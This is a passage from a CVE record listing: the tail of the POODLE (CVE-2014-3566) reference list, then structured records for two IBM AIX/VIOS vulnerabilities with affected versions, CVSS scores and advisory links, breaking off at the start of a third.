"SUSE-SU-2015:0392", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00036.html" }, { "name": "HPSBMU03416", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=144101915224472\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021431" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://support.apple.com/HT204244" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-released.aspx" }, { "name": "HPSBMU03283", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624679706236\u0026w=2" }, { "name": "RHSA-2015:0085", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0085.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6536" }, { "name": "FEDORA-2014-12951", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-November/142330.html" }, { "name": "HPSBGN03191", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141576815022399\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://groups.google.com/forum/#%21topic/docker-user/oYm0i3xShJU" }, { "name": "SSRT101767", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2" }, { "name": "SUSE-SU-2014:1526", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00021.html" }, { "name": "HPSBGN03332", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290371927178\u0026w=2" }, { "name": "RHSA-2014:1652", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1652.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6535" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02" }, { "name": "SUSE-SU-2015:0345", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00027.html" }, { "name": "HPSBST03265", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142546741516006\u0026w=2" }, { "name": "RHSA-2015:0086", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0086.html" }, { "name": "HPSBMU03241", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143039249603103\u0026w=2" }, { "name": "1031124", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031124" }, { "name": "SUSE-SU-2015:0578", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "name": "SUSE-SU-2015:0336", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00024.html" }, { "name": "RHSA-2015:0080", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0080.html" }, { "name": "HPSBMU03294", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142740155824959\u0026w=2" }, { "name": "RHSA-2014:1882", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1882.html" }, { "name": "RHSA-2015:0068", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0068.html" }, { "name": "HPSBGN03251", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142354438527235\u0026w=2" }, { "name": "USN-2486-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "http://www.ubuntu.com/usn/USN-2486-1" }, { "name": "HPSBGN03391", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=144294141001552\u0026w=2" }, { "name": "59627", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/59627" }, { "name": "HPSBGN03208", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141814011518700\u0026w=2" }, { "name": "SSRT101894", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "name": "HPSBMU03214", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141694355519663\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "name": "HPSBMU03263", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "name": "HPSBGN03254", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350298616097\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.lenovo.com/product_security/poodle" }, { "name": "20141014 SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability", "tags": [ "vendor-advisory", "x_refsource_CISCO" ], "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle" }, { "name": "HPSBGN03205", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141775427104070\u0026w=2" }, { "name": "RHSA-2015:0698", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0698.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "name": "SUSE-SU-2014:1361", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://downloads.asterisk.org/pub/security/AST-2014-011.html" }, { "name": "60859", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/60859" }, { "name": "APPLE-SA-2014-10-20-2", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://www.securityfocus.com/archive/1/533746" }, { "name": "GLSA-201507-14", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/201507-14" }, { "name": "SSRT101921", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624719706349\u0026w=2" }, { "name": "SSRT101951", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142496355704097\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-405500.htm" }, { "name": "61345", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61345" }, { "name": "SSRT101834", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143101048219218\u0026w=2" }, { "name": "61019", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61019" }, { "name": "70574", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/70574" }, { "name": "1031120", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031120" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "name": "61825", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61825" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://advisories.mageia.org/MGASA-2014-0416.html" }, { "name": "1031029", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031029" }, { "name": "HPSBUX03281", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04583581" }, { "name": "HPSBMU03262", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624719706349\u0026w=2" }, { "name": "HPSBMU03267", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05068681" }, { "name": "HPSBMU03261", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "name": "SUSE-SU-2016:1459", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00000.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10104" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10705" }, { "name": "61782", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61782" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://access.redhat.com/articles/1232123" }, { "name": "MDVSA-2015:062", "tags": [ "vendor-advisory", "x_refsource_MANDRIVA" ], "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062" }, { "name": "FEDORA-2015-9110", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169361.html" }, { "name": "1031085", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031085" }, { "name": "HPSBST03418", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=144251162130364\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "name": "SSRT101892", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143039249603103\u0026w=2" }, { "name": "APPLE-SA-2014-10-20-1", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://www.securityfocus.com/archive/1/533747" }, { "name": "HPSBGN03233", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "name": "SSRT101916", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624679706236\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687611" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/mpgn/poodle-PoC" }, { "name": "MDVSA-2014:203", "tags": [ "vendor-advisory", "x_refsource_MANDRIVA" ], "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:203" }, { "name": "SSRT101739", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "name": "SSRT101968", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142607790919348\u0026w=2" }, { "tags": [ "x_refsource_MISC" ], "url": "http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.citrix.com/article/CTX216642" }, { "name": "SSRT101899", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142354438527235\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://puppet.com/security/cve/poodle-sslv3-vulnerability" }, { "name": "openSUSE-SU-2015:0190", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00001.html" }, { "name": "APPLE-SA-2015-01-27-4", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://lists.apple.com/archives/security-announce/2015/Jan/msg00003.html" }, { "name": "61303", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61303" }, { "name": "HPSBGN03252", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350743917559\u0026w=2" }, { "name": "HPSBUX03273", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142496355704097\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21692299" }, { "name": "1031039", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031039" }, { "name": "SUSE-SU-2016:1457", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00066.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687172" }, { "name": "SSRT101998", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721830231196\u0026w=2" }, { "name": "SUSE-SU-2015:0344", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00026.html" }, { "name": "SSRT101922", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067" }, { "name": "1031089", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031089" }, { "name": "HPSBGN03253", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350196615714\u0026w=2" }, { "name": "HPSBMU03183", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141628688425177\u0026w=2" }, { "name": "TA14-290A", "tags": [ "third-party-advisory", "x_refsource_CERT" ], "url": "http://www.us-cert.gov/ncas/alerts/TA14-290A" }, { "name": "FEDORA-2014-13012", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141158.html" }, { "name": "61819", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61819" }, { "name": "HPSBGN03255", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142357976805598\u0026w=2" }, { "name": "1031088", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031088" }, { "name": "DSA-3147", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "http://www.debian.org/security/2015/dsa-3147" }, { "name": "61995", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61995" }, { "name": "HPSBGN03202", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141703183219781\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10090" }, { "name": "SSRT101928", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142357976805598\u0026w=2" }, { "name": "1031086", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031086" }, { "name": "HPSBPI03360", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143558192010071\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "name": "RHSA-2014:1692", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1692.html" }, { "name": "FEDORA-2015-9090", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169374.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.openssl.org/~bodo/ssl-poodle.pdf" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021439" }, { "name": "HPSBPI03107", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143558137709884\u0026w=2" }, { "name": "[cxf-commits] 20200116 svn commit: r1055336 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2019-12423.txt.asc security-advisories.data/CVE-2019-17573.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20200319 svn commit: r1058035 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2019-17573.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20200401 svn commit: r1058573 - in /websites/production/cxf/content: cache/main.pageCache index.html security-advisories.data/CVE-2020-1954.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20201112 svn commit: r1067927 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2020-13954.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20210402 svn commit: r1073270 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2021-22696.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20210616 svn commit: r1075801 - in /websites/production/cxf/content: cache/main.pageCache index.html security-advisories.data/CVE-2021-30468.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e%40%3Ccommits.cxf.apache.org%3E" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1015-security-advisory-7" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2014-3566", "datePublished": "2014-10-15T00:00:00", "dateReserved": "2014-05-14T00:00:00", "dateUpdated": "2024-08-06T10:50:17.863Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-22351
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6561275 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/220396 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T03:14:54.612Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6561275" }, { "name": "ibm-aix-cve202222351-dos (220396)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220396" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-03-04T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged trusted host user to exploit a vulnerability in the nimsh daemon to cause a denial of service in the nimsh daemon on another trusted host. IBM X-Force ID: 220396" } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 5.3, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/UI:N/C:N/I:N/A:H/S:C/AV:A/PR:N/AC:H/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-07T16:55:17", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6561275" }, { "name": "ibm-aix-cve202222351-dos (220396)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220396" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-03-04T00:00:00", "ID": "CVE-2022-22351", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged trusted host user to exploit a vulnerability in the nimsh daemon to cause a denial of service in the nimsh daemon on another trusted host. IBM X-Force ID: 220396" } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "H", "AV": "A", "C": "N", "I": "N", "PR": "N", "S": "C", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6561275", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6561275 (AIX)", "url": "https://www.ibm.com/support/pages/node/6561275" }, { "name": "ibm-aix-cve202222351-dos (220396)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220396" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-22351", "datePublished": "2022-03-07T16:55:17.127823Z", "dateReserved": "2022-01-03T00:00:00", "dateUpdated": "2024-09-16T23:31:18.019Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-36768
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6619725 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/232014 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:14:28.435Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6619725" }, { "name": "ibm-aix-cve202236768-priv-escalation (232014)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/232014" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-09-12T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to obtain root privileges. IBM X-Force ID: 232014." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:H/C:H/I:H/AC:L/S:U/PR:N/UI:N/AV:L/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-13T20:45:28", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6619725" }, { "name": "ibm-aix-cve202236768-priv-escalation (232014)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/232014" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-09-12T00:00:00", "ID": "CVE-2022-36768", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to obtain root privileges. IBM X-Force ID: 232014." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6619725", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6619725 (AIX)", "url": "https://www.ibm.com/support/pages/node/6619725" }, { "name": "ibm-aix-cve202236768-priv-escalation (232014)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/232014" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-36768", "datePublished": "2022-09-13T20:45:28.190424Z", "dateReserved": "2022-07-26T00:00:00", "dateUpdated": "2024-09-16T20:27:18.501Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-39165
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847947 | vendor-advisory | |
